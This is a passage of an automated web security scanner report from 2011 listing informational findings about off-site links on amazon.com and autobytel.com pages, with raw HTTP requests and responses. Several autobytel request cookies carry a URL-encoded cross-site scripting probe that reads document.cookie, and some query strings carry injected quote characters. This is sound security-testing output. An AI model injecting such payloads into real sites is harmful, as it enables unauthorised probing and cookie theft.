<a href="http://www.amazon.com/Joomla-1-5-Building-Successful-Powered/dp/0137012314/ref=pd_cp_b_1_img" id="pd_cp_b_1_img_0137012314" ><img src="http://ecx.images-amazon.com/images/I/51wRgcBVifL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg" width="50" alt="Joomla! 1.5: A User's Guide: Building a Successful Joomla! Powered Website (2nd Edition)" height="50" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Joomla-Dummies-Steve-Holzner-Ph-D/dp/047043287X/ref=pd_cp_b_2_img" id="pd_cp_b_2_img_047043287X" ><img src="http://ecx.images-amazon.com/images/I/51-3onLAtSL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg" width="50" alt="Joomla! For Dummies" height="50" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Joomla-Start-Finish-Maintain-Programmer/dp/047057089X/ref=pd_cp_b_3_img" id="pd_cp_b_3_img_047057089X" ><img src="http://ecx.images-amazon.com/images/I/51J3zzq8r3L._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg" width="50" alt="Joomla! Start to Finish: How to Plan, Execute, and Maintain Your Web Site (Wrox Programmer to Programmer)" height="50" border="0" /></a>
...[SNIP]...
<div class="loading_ind" style="text-align: center; width: 100%; display: none;">
<img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif" width="100" alt="Loading..." height="124" border="0" />
</div>
...[SNIP]...
<div class="loading_ind" style="display:none" width="100%">
<img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195480_.gif" style="padding:8px 0px 0px 100px" />
</div>
...[SNIP]...
<div width="100%" style="display: none;" class="loading_ind">
<img style="padding: 8px 0px 0px 100px;" src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif"/>
</div>
...[SNIP]...
<div width="100%" style="display: none;" class="loading_ind">
<img style="padding: 8px 0px 0px 100px;" src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif"/>
</div>
...[SNIP]...
<div style="background-color:#eff7fe;border:1px solid #0f3c6d;padding:10px;text-align:left;" class="small">
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reputation/suggestionbox._V192249929_.gif" width="1" align="left" height="1" border="0" />
<div name="hmdFormDiv" id="hmdFormDiv">
...[SNIP]...
<td>
    <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />
    If you need help or have a question for Customer Service, <a href="/gp/help/customer/display.html/ref=cm_r8n_hmd_contact?ie=UTF8&amp;nodeId=518316">
...[SNIP]...
<td>
           
   
                                                               <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />&nbsp;Would you like to <b>
...[SNIP]...
<td>
    <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />

Is there any other feedback you would like to provide?


    <b>
...[SNIP]...
<a href="/ref=footer_logo/177-3345764-3077262"><img src="http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V192570482_.gif" width="126" alt="amazon.com" height="24" border="0" /></a>
...[SNIP]...
<div class="navFooterLine navFooterLinkLine navFooterPadItemLine">
<a href="http://www.amazon.ca">Canada</a>
<a href="http://www.amazon.cn">China</a>
<a href="http://www.amazon.fr">France</a>
<a href="http://www.amazon.de">Germany</a>
<a href="http://www.amazon.it">Italy</a>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.audible.com">Audible<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.dpreview.com">DPReview<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.endless.com">Endless<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.fabric.com">Fabric<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.imdb.com">IMDb<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.shopbop.com/welcome">Shopbop<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.smallparts.com">Small Parts<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.warehousedeals.com">Warehouse Deals<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.woot.com">Woot<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.zappos.com">Zappos<br/>
...[SNIP]...

20.554. http://www.amazon.com/music-rock-classical-pop-jazz/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.amazon.com
Path:   /music-rock-classical-pop-jazz/b

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.amazon.com/music-rock-classical-pop-jazz/b?ie\\x3dUTF8\\x26amp;node\\x3d5174\\x22
The response contains the following links to other domains:
  • http://g-ecx.images-amazon.com/images/G/01/x-locale/common/kailey-kitty._V192239871_.gif
  • http://g-ecx.images-amazon.com/images/G/01/x-locale/common/orange-arrow._V192240581_.gif
  • http://g-ecx.images-amazon.com/images/G/01/x-locale/common/small-logo._V192240376_.gif

Request

GET /music-rock-classical-pop-jazz/b?ie\\x3dUTF8\\x26amp;node\\x3d5174\\x22 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 NotFound
Date: Mon, 24 Jan 2011 16:03:26 GMT
Server: Server
x-amz-id-1: 0S03YGZH13FYDGVQHEZB
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: L/lGuyme01dn50YaJ8EP0PPn5pYb2js8JiU8U2cLmud0JxL0kOFLCeAjK4EdrWJ5
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=177-3286726-1147164; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 16144


<html>
<head>

<style type="text/css"><!--
.serif { font-family: times,serif; font-size: small; }
.sans { font-family: verdana,arial,helvetica,sans-serif; font-size: small; }
.small { font-fami
...[SNIP]...
<a href="/177-3286726-1147164"><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/small-logo._V192240376_.gif" width="142" height="31" border="0" /></a>
...[SNIP]...
<td>
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/kailey-kitty._V192239871_.gif" width="40" height="35" border="0" />
</td>
...[SNIP]...
<br />
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/orange-arrow._V192240581_.gif" width="10" height="9" border="0" />
<b>
...[SNIP]...

20.555. http://www.amazon.com/toys/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.amazon.com
Path:   /toys/b

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.amazon.com/toys/b?ie\\x3dUTF8\\x26amp;node\\x3d165793011\\x22
The response contains the following links to other domains:
  • http://g-ecx.images-amazon.com/images/G/01/x-locale/common/kailey-kitty._V192239871_.gif
  • http://g-ecx.images-amazon.com/images/G/01/x-locale/common/orange-arrow._V192240581_.gif
  • http://g-ecx.images-amazon.com/images/G/01/x-locale/common/small-logo._V192240376_.gif

Request

GET /toys/b?ie\\x3dUTF8\\x26amp;node\\x3d165793011\\x22 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 NotFound
Date: Mon, 24 Jan 2011 16:03:33 GMT
Server: Server
x-amz-id-1: 1QF99C3QCJJF5XR5QJ7P
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: qhlW+8nQRDOrcNraO1mGzwsF2kBkWiXnLrbc/30PXhTrjXKViwsrAGez04QEWjGO
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=188-0775702-1721755; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 16144


<html>
<head>

<style type="text/css"><!--
.serif { font-family: times,serif; font-size: small; }
.sans { font-family: verdana,arial,helvetica,sans-serif; font-size: small; }
.small { font-fami
...[SNIP]...
<a href="/188-0775702-1721755"><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/small-logo._V192240376_.gif" width="142" height="31" border="0" /></a>
...[SNIP]...
<td>
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/kailey-kitty._V192239871_.gif" width="40" height="35" border="0" />
</td>
...[SNIP]...
<br />
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/orange-arrow._V192240581_.gif" width="10" height="9" border="0" />
<b>
...[SNIP]...

20.556. http://www.autobytel.com/content/buy/index.cfm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/buy/index.cfm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.autobytel.com/content/buy/index.cfm?id=13148;ABTL
The response contains the following links to other domains:
  • http://ad.doubleclick.net/ad/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47A27398-0D71-2922-D4AC6FB50C81ECE3|||13148|||;sz=728x90;ptile=1;!cat=;ord=22398696?
  • http://ad.doubleclick.net/adi/abtl.research/;kw=;info=13148;dcopt=ist;u=|||47A27398-0D71-2922-D4AC6FB50C81ECE3|||13148|||;sz=728x90;ptile=1;!cat=;ord=22398696?
  • http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47A27398-0D71-2922-D4AC6FB50C81ECE3|||13148|||;sz=728x90;ptile=1;!cat=;ord=22398696?
  • http://ad.doubleclick.net/jump/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47A27398-0D71-2922-D4AC6FB50C81ECE3|||13148|||;sz=728x90;ptile=1;!cat=;ord=22398696?
  • http://www.autocheck.com/?WT.mc_id=1824&siteID=1824
  • http://www.myproductadvisor.com/mpa/autobytel/setCookie.do?Return=http://www.autobytel.com/car-finder.htm

Request

GET /content/buy/index.cfm?id=13148;ABTL HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=UTF-8
Location: /content/Search/index.cfm?id=13148;ABTL
Server: Microsoft-IIS/7.0
Content-Length: 11939
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 23:30:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:30:28 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:30:27 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<li><a href="http://www.autocheck.com/?WT.mc_id=1824&siteID=1824" title="Vehicle History Reports">Vehicle History Reports</a>
...[SNIP]...
<li><a href="http://www.myproductadvisor.com/mpa/autobytel/setCookie.do?Return=http://www.autobytel.com/car-finder.htm" title="Car Finder" >
               My Advisor
           </a>
...[SNIP]...
<!-- This tag should be placed in all categories in the 468x60 size space -->


   <IFRAME SRC="http://ad.doubleclick.net/adi/abtl.research/;kw=;info=13148;dcopt=ist;u=|||47A27398-0D71-2922-D4AC6FB50C81ECE3|||13148|||;sz=728x90;ptile=1;!cat=;ord=22398696?" name="frame1" width="728" height="90" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47A27398-0D71-2922-D4AC6FB50C81ECE3|||13148|||;sz=728x90;ptile=1;!cat=;ord=22398696?"></SCRIPT>
       <NOSCRIPT>
           <A HREF="http://ad.doubleclick.net/jump/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47A27398-0D71-2922-D4AC6FB50C81ECE3|||13148|||;sz=728x90;ptile=1;!cat=;ord=22398696?"><IMG SRC="http://ad.doubleclick.net/ad/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47A27398-0D71-2922-D4AC6FB50C81ECE3|||13148|||;sz=728x90;ptile=1;!cat=;ord=22398696?" border=0 height="90" width="728"></A>
...[SNIP]...

20.557. http://www.autobytel.com/content/home/help/index.cfm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/home/help/index.cfm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.autobytel.com/content/home/help/index.cfm?id=13148;ABTL&action=privacy
The response contains the following links to other domains:
  • http://ad.doubleclick.net/ad/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47EC3672-DE5D-69C7-48B98AA1600E71B7|||13148|||;sz=728x90;ptile=1;!cat=;ord=31515196?
  • http://ad.doubleclick.net/ad/abtl.research/;abr=!ie;kw=;info=13148;u=|||47EC3672-DE5D-69C7-48B98AA1600E71B7|||13148|||;sz=160x600;ptile=2;!cat=;ord=31515196?
  • http://ad.doubleclick.net/adi/abtl.research/;kw=;info=13148;dcopt=ist;u=|||47EC3672-DE5D-69C7-48B98AA1600E71B7|||13148|||;sz=728x90;ptile=1;!cat=;ord=31515196?
  • http://ad.doubleclick.net/adi/abtl.research/;kw=;info=13148;u=|||47EC3672-DE5D-69C7-48B98AA1600E71B7|||13148|||;sz=160x600;ptile=2;!cat=;ord=31515196?
  • http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47EC3672-DE5D-69C7-48B98AA1600E71B7|||13148|||;sz=728x90;ptile=1;!cat=;ord=31515196?
  • http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||47EC3672-DE5D-69C7-48B98AA1600E71B7|||13148|||;sz=160x600;ptile=2;!cat=;ord=31515196?
  • http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||47EC3672-DE5D-69C7-48B98AA1600E71B7|||13148|||;sz=1x3;!cat=;ord=31515196?
  • http://ad.doubleclick.net/jump/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47EC3672-DE5D-69C7-48B98AA1600E71B7|||13148|||;sz=728x90;ptile=1;!cat=;ord=31515196?
  • http://ad.doubleclick.net/jump/abtl.research/;abr=!ie;kw=;info=13148;u=|||47EC3672-DE5D-69C7-48B98AA1600E71B7|||13148|||;sz=160x600;ptile=2;!cat=;ord=31515196?
  • http://an.tacoda.net/an/17295/slf.js
  • http://finance.car.com/
  • http://js.revsci.net/gateway/gw.js?csid=K04491
  • http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=autobytel_cs=1&betq=10221=416162
  • http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
  • http://rt.displaymarketplace.com/optout.html
  • http://smp.specificmedia.com/smp/v=5;m=1;t=2568;ts=1295912311270
  • http://tags.bluekai.com/site/10?ret=html
  • http://www.autocheck.com/?WT.mc_id=1824&siteID=1824
  • http://www.autotropolis.com/
  • http://www.autoweb.com/
  • http://www.bkrtx.com/js/bk-static.js
  • http://www.car.com/
  • http://www.carsmart.com/
  • http://www.datranmedia.com/privacy/
  • http://www.myproductadvisor.com/mpa/autobytel/setCookie.do?Return=http://www.autobytel.com/car-finder.htm
  • http://www.myride.com/
  • http://www.networkadvertising.org/
  • http://www.networkadvertising.org/managing/opt_out.asp

Request

GET /content/home/help/index.cfm?id=13148;ABTL&action=privacy HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:38:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:38:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:38:31 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:38:31 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 55331


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<li><a href="http://www.autocheck.com/?WT.mc_id=1824&siteID=1824" title="Vehicle History Reports">Vehicle History Reports</a>
...[SNIP]...
<li><a href="http://www.myproductadvisor.com/mpa/autobytel/setCookie.do?Return=http://www.autobytel.com/car-finder.htm" title="Car Finder" >
               My Advisor
           </a>
...[SNIP]...
<!-- This tag should be placed in all categories in the 468x60 size space -->


   <IFRAME SRC="http://ad.doubleclick.net/adi/abtl.research/;kw=;info=13148;dcopt=ist;u=|||47EC3672-DE5D-69C7-48B98AA1600E71B7|||13148|||;sz=728x90;ptile=1;!cat=;ord=31515196?" name="frame1" width="728" height="90" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47EC3672-DE5D-69C7-48B98AA1600E71B7|||13148|||;sz=728x90;ptile=1;!cat=;ord=31515196?"></SCRIPT>
       <NOSCRIPT>
           <A HREF="http://ad.doubleclick.net/jump/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47EC3672-DE5D-69C7-48B98AA1600E71B7|||13148|||;sz=728x90;ptile=1;!cat=;ord=31515196?"><IMG SRC="http://ad.doubleclick.net/ad/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47EC3672-DE5D-69C7-48B98AA1600E71B7|||13148|||;sz=728x90;ptile=1;!cat=;ord=31515196?" border=0 height="90" width="728"></A>
...[SNIP]...
</a>,
<a
href="http://www.autotropolis.com/">
http://www.autotropolis.com</a>,
<a href="http://www.autoweb.com/">http://www.autoweb.com</a>, <a
href="http://www.carsmart.com/">
http://www.carsmart.com</a>, <a
href="http://www.car.com/">
http://www.car.com</a>, <a
href="http://finance.car.com/">
http://finance.car.com</a> and <a
href="http://www.myride.com/">
http://www.myride.com</a>
...[SNIP]...
when you receive a new cookie. Use of third party cookies is subject to the privacy policies and opt-out procedures of these third parties and not Autobytel's policy and procedures. Please click here <a href="http://www.networkadvertising.org" target="_blank">www.networkadvertising.org</a>
...[SNIP]...
out the data and information collection and use practices of some of the third parties for which we set cookies on Autobytel Websites or for which we enable to set their own cookies. Please click here <a href="http://www.networkadvertising.org/managing/opt_out.asp" target="_blank">http://www.networkadvertising.org/managing/opt_out.asp</a>
...[SNIP]...
hich a cookie is set on your computer and which is not included in the preceding link is Datran Media's Aperture product. Datran Media's privacy policy can be viewed by clicking on the following link: <a href="http://www.datranmedia.com/privacy/" target="_blank">http://www.datranmedia.com/privacy/</a>. Should you wish to opt-out of Datran Media's cookies, you may access Datran Media's opt-out procedure by clicking on the following link: <a href="http://rt.displaymarketplace.com/optout.html" target="_blank">http://rt.displaymarketplace.com/optout.html</a>
...[SNIP]...
<div>
           <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||47EC3672-DE5D-69C7-48B98AA1600E71B7|||13148|||;sz=1x3;!cat=;ord=31515196?"></script>
...[SNIP]...
<TD ALIGN="center" class="SmallFont">
                       
                           A D V E R T I S E M E N T
                       
                       
       <IFRAME SRC="http://ad.doubleclick.net/adi/abtl.research/;kw=;info=13148;u=|||47EC3672-DE5D-69C7-48B98AA1600E71B7|||13148|||;sz=160x600;ptile=2;!cat=;ord=31515196?" name="frame1" width="160" height="600" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||47EC3672-DE5D-69C7-48B98AA1600E71B7|||13148|||;sz=160x600;ptile=2;!cat=;ord=31515196?">
       </SCRIPT>
       <NOSCRIPT>
           <A HREF="http://ad.doubleclick.net/jump/abtl.research/;abr=!ie;kw=;info=13148;u=|||47EC3672-DE5D-69C7-48B98AA1600E71B7|||13148|||;sz=160x600;ptile=2;!cat=;ord=31515196?"><IMG SRC="http://ad.doubleclick.net/ad/abtl.research/;abr=!ie;kw=;info=13148;u=|||47EC3672-DE5D-69C7-48B98AA1600E71B7|||13148|||;sz=160x600;ptile=2;!cat=;ord=31515196?" border=0 height="600" width="160"></A>
...[SNIP]...
</a> |
               <a href="http://www.myride.com" class="footernav" >MYRIDE.COM</a>
...[SNIP]...
</iframe>
       
       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...
<noscript>
           <iframe name="__bknsframe" height=0 width=0 frameborder=0 src="http://tags.bluekai.com/site/10?ret=html"></iframe>
...[SNIP]...
<!-- End: Blue Kai -->
       
       
       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>

       
       <img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=autobytel_cs=1&betq=10221=416162" width="1" height="1" border="0" alt="">
       
       <!-- Tacoda Tracking Pixel: A. Newman 04/02/08 -->
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no">
</SCRIPT>


<!-- Start of Standard Pixel Code -->

   <img src='http://smp.specificmedia.com/smp/v=5;m=1;t=2568;ts=1295912311270' width='0' height='1' border='0' />

<!-- End of Standard Pixel Code -->
...[SNIP]...

20.558. http://www.autobytel.com/content/home/index.cfm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/home/index.cfm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.autobytel.com/content/home/index.cfm?id=4;ABTL
The response contains the following links to other domains:
  • http://ad.doubleclick.net/ad/abtl.home/fms;abr=!ie;kw=fms;info=4;u=|||47EE0915-DC8E-3C0E-CC4C4D144A76CE6B|||4|||;sz=586x90;ord=16681240?
  • http://ad.doubleclick.net/ad/abtl.home/lsuv;abr=!ie;kw=;info=4;u=|||47EE0915-DC8E-3C0E-CC4C4D144A76CE6B|||4|||;sz=369x78;!cat=;ord=16681240?
  • http://ad.doubleclick.net/adi/abtl.home/fms;kw=fms;info=4;u=|||47EE0915-DC8E-3C0E-CC4C4D144A76CE6B|||4|||;sz=586x90;ord=16681240?
  • http://ad.doubleclick.net/adi/abtl.home/lsuv;kw=;info=4;u=|||47EE0915-DC8E-3C0E-CC4C4D144A76CE6B|||4|||;sz=369x78;!cat=;ord=16681240?
  • http://ad.doubleclick.net/adj/abtl.home/fms;abr=!ie;kw=fms;info=4;u=|||47EE0915-DC8E-3C0E-CC4C4D144A76CE6B|||4|||;sz=597x90;ord=16681240?
  • http://ad.doubleclick.net/adj/abtl.home/lsuv;abr=!ie;kw=;info=4;u=|||47EE0915-DC8E-3C0E-CC4C4D144A76CE6B|||4|||;sz=369x78;!cat=;ord=16681240?
  • http://ad.doubleclick.net/jump/abtl.home/fms;abr=!ie;kw=fms;info=4;u=|||47EE0915-DC8E-3C0E-CC4C4D144A76CE6B|||4|||;sz=597x90;ord=16681240?
  • http://ad.doubleclick.net/jump/abtl.home/lsuv;abr=!ie;kw=;info=4;u=|||47EE0915-DC8E-3C0E-CC4C4D144A76CE6B|||4|||;sz=369x78;!cat=;ord=16681240?
  • http://an.tacoda.net/an/17295/slf.js
  • http://fls.doubleclick.net/activityi;src=2819819;type=retar278;cat=autob211;ord=16681240?
  • http://js.revsci.net/gateway/gw.js?csid=K04491
  • http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=autobytel_cs=1&betq=10221=416162
  • http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
  • http://smp.specificmedia.com/smp/v=5;m=1;t=2568;ts=1295912323426
  • http://tags.bluekai.com/site/10?ret=html
  • http://www.autocheck.com/?WT.mc_id=1824&siteID=1824
  • http://www.bkrtx.com/js/bk-static.js
  • http://www.myproductadvisor.com/mpa/autobytel/setCookie.do?Return=http://www.autobytel.com/car-finder.htm
  • http://www.myride.com/

Request

GET /content/home/index.cfm?id=4;ABTL HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:38:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:38:44 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:38:43 GMT;path=/
Set-Cookie: ID=;expires=Sun, 24-Jan-2010 23:38:43 GMT;path=/
Set-Cookie: ID=4%3BABTL;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 70441


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<noscript>
       <iframe src="http://fls.doubleclick.net/activityi;src=2819819;type=retar278;cat=autob211;ord=16681240?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...
